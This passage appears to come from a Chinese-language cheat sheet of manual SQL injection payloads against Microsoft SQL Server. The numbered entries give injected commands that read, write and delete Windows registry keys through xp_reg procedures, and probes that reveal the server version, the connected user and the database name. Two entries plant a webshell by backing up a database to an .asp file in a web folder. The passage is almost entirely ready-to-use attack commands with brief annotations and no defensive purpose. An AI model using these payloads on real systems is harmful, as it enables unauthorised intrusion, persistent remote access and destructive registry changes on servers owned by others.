带注释手动注入脚本命令总结

;exec xp_regread

’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersion’,’CommonFilesDir’ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersion’,’TestValueName’ 删除某个值

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionTestkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values (’’);

backup database model to disk=’c:l.asp’;

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (’’);

backup database model to disk=’g:wwwtestl.asp’;